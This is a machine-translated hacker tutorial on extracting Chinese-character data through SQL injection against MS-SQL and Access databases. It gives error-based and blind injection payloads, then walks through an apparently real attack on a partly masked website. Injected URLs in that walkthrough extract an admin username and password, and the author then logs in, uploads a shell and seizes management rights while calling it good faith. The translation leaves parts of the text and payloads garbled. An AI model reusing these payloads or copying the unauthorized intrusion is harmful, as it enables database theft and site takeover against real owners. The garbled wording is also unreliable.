Two Methods of SQL Injection Chinese Prediction

Flying vest @ Ada Lab SEU

1. Chinese Character prediction in MS-SQL

It can be said that the Chinese Characters Under the MS-SQL is not to guess, you as long as the conditions of the construction is good enough, you can directly let the other side in the error when the data content is directly displayed. The common practice is to perform another type operation on the column where the content you want to guess is located. As a result, incorrect type conversion is performed during execution, the query will fail and an error message will be returned, and the content to be guessed is exactly in the information, for example:

Select * from sysusers where [name] + 1 = 2

The name column is nvarchar. If you want him to perform addition operations, it must be an error:

Syntax error converting the nvarchar value public to a column of data type int.

We should be able to directly obtain the required information from the returned error, such as the public here.
So said, MS-SQL Chinese Characters Under the speculation, there is no need to spend a lot of effort.

2. Prediction of Chinese Characters in ACCESS

● Determination of Chinese Characters

It is very simple. If you find that a website is Chinese and there is an exception during injection, you may guess that the content is Chinese. Normally, we are determined as follows:

... 0 <> (select count (*) from admin where left (xxx, 1) between char (20) and char (254 )).....

This is just to guess in the visible characters. If there is a problem in such a large range, you can try this:

... 0 <> (select count (*) from admin where left (xxx, 1) between char (254) and char (255 )).....

If this condition is met, unfortunately, you have met Chinese.

● Indirect Prediction

If it is a Chinese character, a Chinese character is not split when the left and right operations are performed on each data item in the column. That is to say, if there is a record that is "0 I 1", then:

Right (left (xxx, 1), 1) = 0
Right (left (xxx, 2), 1) = me
Right (left (xxx, 3), 1) = 1

Someone immediately thought of converting to an integer to guess, and then return to figure out what Chinese character it is. This is indeed acceptable, and the idea is clever. The general method is to construct the following conditions:

Asc (right (left (xxx, N), 1) <-XXXXX

In terms of experience, the number below the symbol should be below-10000, and then the result obtained during the specific injection will be reduced continuously, and finally a small negative number will be obtained. After determining this negative number, you can use a calculator to calculate the hexadecimal code and then use the editing software to obtain Chinese characters. For example, if the integer you get is-10532, you should get D6DC after using the calculator, and edit it in hexadecimal format in UltraEdit, we can see that D6DC gets the word "Week.

● Direct prediction

Just as you can guess about non-Chinese characters, you can also use between to gradually narrow down the range and finally get an accurate Chinese character. The key to this method is to understand how between handles Chinese characters. At first, I made some detours in this regard. Later, I was able to thoroughly understand it thanks to the bully (46466397, originally, unlike what I initially thought, between compared Chinese characters through the unicode encoding sequence between them. I did not find a unicode table on the Internet. I made a copy under the guidance of Overlord.
During speculation, the range is gradually reduced. for the determination of Chinese characters, you can use the between in the maximum range to obtain them all at once. For example, the following query condition is used, it can be determined that the data to be guessed must be Chinese characters:

... Right (left (xxx, N), 1) between 1 and others

Since the unicode-Encoded chinese characters are not arranged according to the common degree, in fact it brings a lot of trouble to guess. Generally, I tend to write a program to guess, the time complexity of the two methods is the same, and it may be easier to write programs using the second method.

● Applicability

All are applicable. However, the second method is generally used and is not applicable when filtering is performed. The first method of manual guessing should be very common. I also made a conversion tool to obtain the corresponding Chinese characters directly from a negative integer.

● Others

Both methods are effective for the prediction of the characters in the Far East, and should be effective for all non-ASCII code guesses. If you inject Japanese or Korean, you can simply use the above method. The difference is only encoding.

● Instance

Www.jXXXXXX.org was tested last week (in good faith !), We first guessed a user whose password is 19831016% %. We learned through len that the username length is 2 and determined as Chinese characters, and started to guess:

Asp? NewsID = 264% 20and % 200 <;> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20asc (left (username, 1) <-10000 "> http://www.jXXXXXX.org/shownews.asp? NewsID = 264% 20and % 200 <;> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20asc (left (username, 1) <-10000)

Confirm that the value is less than-10000, and then gradually narrow down the scope, and finally determine that the value is-10532.

(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20asc (left (username, 1 )) =-10532 "> http://www.jXXXXXX.org/shownews.asp? NewsID = 264% 20and % 200 <;> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20asc (left (username, 1) =-10532)

Open the calculator, select the scientific type, and convert it to the hexadecimal single word, which is D6DC. Use UltraEdit to edit it as the weekly word. Then I guess the next word in another way and gradually narrow down the scope:

(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20 right (left (username, 2 ), 1) % 20 between % 20 "> http://www.jXXXXXX.org/shownews.asp? NewsID = 264% 20and % 200 <;> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20 right (left (username, 2), 1) % 20 between % 20 not % 20and % 20)

Then confirm one by one, and finally get the word "last:

(Select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20 right (left (username, 2 ), 1) = "> http://www.jXXXXXX.org/shownews.asp? NewsID = 264% 20and % 200 <;> (select % 20 count (*) % 20 from % 20 admin % 20 where % 20 password = 19831016% % 20and % 20 right (left (username, 2), 1) = last)

Similarly, we guessed a super administrator's username/password. After logging in, we uploaded the shell and obtained the management permission. It is not malicious. It just proves that the user name and password of Chinese characters will not bring you better security.